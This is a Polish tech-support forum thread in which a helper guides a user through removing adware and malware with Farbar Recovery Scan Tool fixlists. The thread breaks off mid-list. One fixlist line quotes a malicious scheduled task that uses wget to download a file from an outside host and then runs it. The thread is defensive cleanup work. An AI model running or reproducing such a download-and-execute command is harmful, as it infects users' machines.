Problem z wirusem

Valliathe · 23 Styczeń 2015 23:49

Witajcie,

Atis · 24 Styczeń 2015 00:00

Nowy log obowiązkowy - Farbar Recovery Scan Tool

Valliathe · 24 Styczeń 2015 00:16

FRST.txt: http://www.wklej.org/id/1606525/

Atis · 24 Styczeń 2015 00:24

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :

CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-919231592-2366990794-1530580587-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-919231592-2366990794-1530580587-1000\...\Run: [Akamai NetSession Interface] => "C:\Users\Admin\AppData\Local\Akamai\netsession_win.exe"
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
BHO: Senses -> {11111111-1111-1111-1111-110611191115} -> C:\Program Files (x86)\Senses\Senses-bho64.dll (Object Browser)
BHO: No Name -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> No File
Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File
CHR HKU\S-1-5-21-919231592-2366990794-1530580587-1000\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - No Path
R1 {00c97d86-accb-4288-9972-6d929c1fe93a}Gw64; C:\Windows\System32\drivers\{00c97d86-accb-4288-9972-6d929c1fe93a}Gw64.sys [48776 2014-10-17] (StdLib)
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 MBfilt; system32\drivers\MBfilt64.sys [X]
S3 RSUSBSTOR; System32\Drivers\RtsUStor.sys [X]
C:\Windows\System32\drivers\{00c97d86-accb-4288-9972-6d929c1fe93a}Gw64.sys
C:\Program Files (x86)\Senses
C:\Program Files (x86)\Apps Hat
C:\ProgramData\dat.bmp
C:\ProgramData\*.exe
Task: {155A4059-6E78-4D5F-80AC-C428CCAE7ED9} - System32\Tasks\DriverToolkit Autorun => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe
Task: {1A049B5B-B9C1-43F9-B39E-707D3D98C8D2} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=f2xVGapqCe;Set-up.exe;1421889688 &amp; start cmd /R dat.bmp <==== ATTENTION
Task: {8D223F63-07BF-47A1-BDED-DBA6B0A29BF7} - System32\Tasks\ebcd74ed-0212-4188-b574-981f73363623-1 => C:\Program Files (x86)\Senses\Senses-codedownloader.exe <==== ATTENTION
Task: {964846E5-35D4-4B8E-BEA2-9B4E9CE2A83E} - System32\Tasks\07050b38-1064-4757-a89c-fb7383a998f7-5 => C:\Program Files (x86)\Apps Hat\07050b38-1064-4757-a89c-fb7383a998f7-5.exe <==== ATTENTION
Task: {ABA8D388-D1AE-47C7-8F0D-CB291B06FB19} - System32\Tasks\Norton Anti-Theft\Norton Error Processor => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.9.0.14\SymErr.exe
Task: {BC96CEB2-83FC-4593-A59D-2EC87F4D65B4} - System32\Tasks\07050b38-1064-4757-a89c-fb7383a998f7-1 => C:\Program Files (x86)\Apps Hat\Apps Hat-codedownloader.exe <==== ATTENTION
Task: {DD033D7E-171D-4AC3-A0BD-69FDF00C92ED} - System32\Tasks\{8ADF22E7-8CB2-4782-8FBA-B423299ADBAF} => pcalua.exe -a "C:\GOG Games\Alan Wake\Language Setup.exe" -d "C:\GOG Games\Alan Wake"
Task: {FF94C077-AE6A-424E-8C93-8C7717E707FC} - System32\Tasks\07050b38-1064-4757-a89c-fb7383a998f7-5_user => C:\Program Files (x86)\Apps Hat\07050b38-1064-4757-a89c-fb7383a998f7-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\07050b38-1064-4757-a89c-fb7383a998f7-1.job => C:\Program Files (x86)\Apps Hat\Apps Hat-codedownloader.exe <==== ATTENTION
Task: C:\Windows\Tasks\07050b38-1064-4757-a89c-fb7383a998f7-11.job => C:\Program Files (x86)\Apps Hat\07050b38-1064-4757-a89c-fb7383a998f7-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\07050b38-1064-4757-a89c-fb7383a998f7-4.job => C:\Program Files (x86)\Apps Hat\07050b38-1064-4757-a89c-fb7383a998f7-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\07050b38-1064-4757-a89c-fb7383a998f7-5.job => C:\Program Files (x86)\Apps Hat\07050b38-1064-4757-a89c-fb7383a998f7-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\07050b38-1064-4757-a89c-fb7383a998f7-5_user.job => C:\Program Files (x86)\Apps Hat\07050b38-1064-4757-a89c-fb7383a998f7-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\DriverToolkit Autorun.job => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe
Task: C:\Windows\Tasks\ebcd74ed-0212-4188-b574-981f73363623-1.job => C:\Program Files (x86)\Senses\Senses-codedownloader.exe <==== ATTENTION
Task: C:\Windows\Tasks\ebcd74ed-0212-4188-b574-981f73363623-11.job => C:\Program Files (x86)\Senses\ebcd74ed-0212-4188-b574-981f73363623-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\ebcd74ed-0212-4188-b574-981f73363623-2.job => C:\Program Files (x86)\Senses\ebcd74ed-0212-4188-b574-981f73363623-2.exe <==== ATTENTION
Task: C:\Windows\Tasks\ebcd74ed-0212-4188-b574-981f73363623-3.job => C:\Program Files (x86)\Senses\ebcd74ed-0212-4188-b574-981f73363623-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\ebcd74ed-0212-4188-b574-981f73363623-4.job => C:\Program Files (x86)\Senses\ebcd74ed-0212-4188-b574-981f73363623-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\ebcd74ed-0212-4188-b574-981f73363623-5.job => C:\Program Files (x86)\Senses\ebcd74ed-0212-4188-b574-981f73363623-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\ebcd74ed-0212-4188-b574-981f73363623-5_user.job => C:\Program Files (x86)\Senses\ebcd74ed-0212-4188-b574-981f73363623-5.exe <==== ATTENTION
AlternateDataStreams: C:\Users\Admin\Ustawienia lokalne:sOjlEVQYfmK5gKSksgxwfPyU5Et
AlternateDataStreams: C:\Users\Admin\AppData\Local:sOjlEVQYfmK5gKSksgxwfPyU5Et
AlternateDataStreams: C:\Users\Admin\AppData\Local\Dane aplikacji:sOjlEVQYfmK5gKSksgxwfPyU5Et
AlternateDataStreams: C:\Users\Admin\AppData\Local\Temp:oRtx38o2SclnL3bJRAZ5fhbV1IndYt
AlternateDataStreams: C:\ProgramData\TEMP:56E2E879
EmptyTemp:

Uruchom FRST i kliknij Fix. Pokaż raport z usuwania Fixlog.

Kliknij Scan i pokaż nowy raport z FRST bez Addition.

Valliathe · 24 Styczeń 2015 00:35

Fixlog: http://www.wklej.org/id/1606545/

Atis · 24 Styczeń 2015 00:40

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :

2015-01-16 09:20 - 2014-10-24 14:58 - 00000000 ____ D () C:\Program Files (x86)\RelevantKnowledge
2015-01-23 19:21 - 2014-10-18 18:26 - 00000000 ____ D () C:\ProgramData\boost_interprocess
DeleteQuarantine:

Uruchom FRST i kliknij Fix. Skasuj folder C:\FRST

Usuń stare punkty przywracania: Aby usunąć wszystkie punkty przywracania

Dysk przeskanuj Malwarebytes Anti-Malware

Podczas instalacji usuń zaznaczenie przy Uruchom okres testowy Malwarebytes Anti-Malware Premium.

http://wstaw.org/m/2014/03/25/2014-03-25_123039.png

Język PL > Settings > General Settings > Language > Polish

Przeczytaj w jaki sposób należy instalować programy: KLIK - KLIK - KLIK - KLIK

Odinstaluj:

Adobe Flash Player 10 ActiveX

Adobe Flash Player 15 Plugin

Java 8 Update 25

Zainstaluj: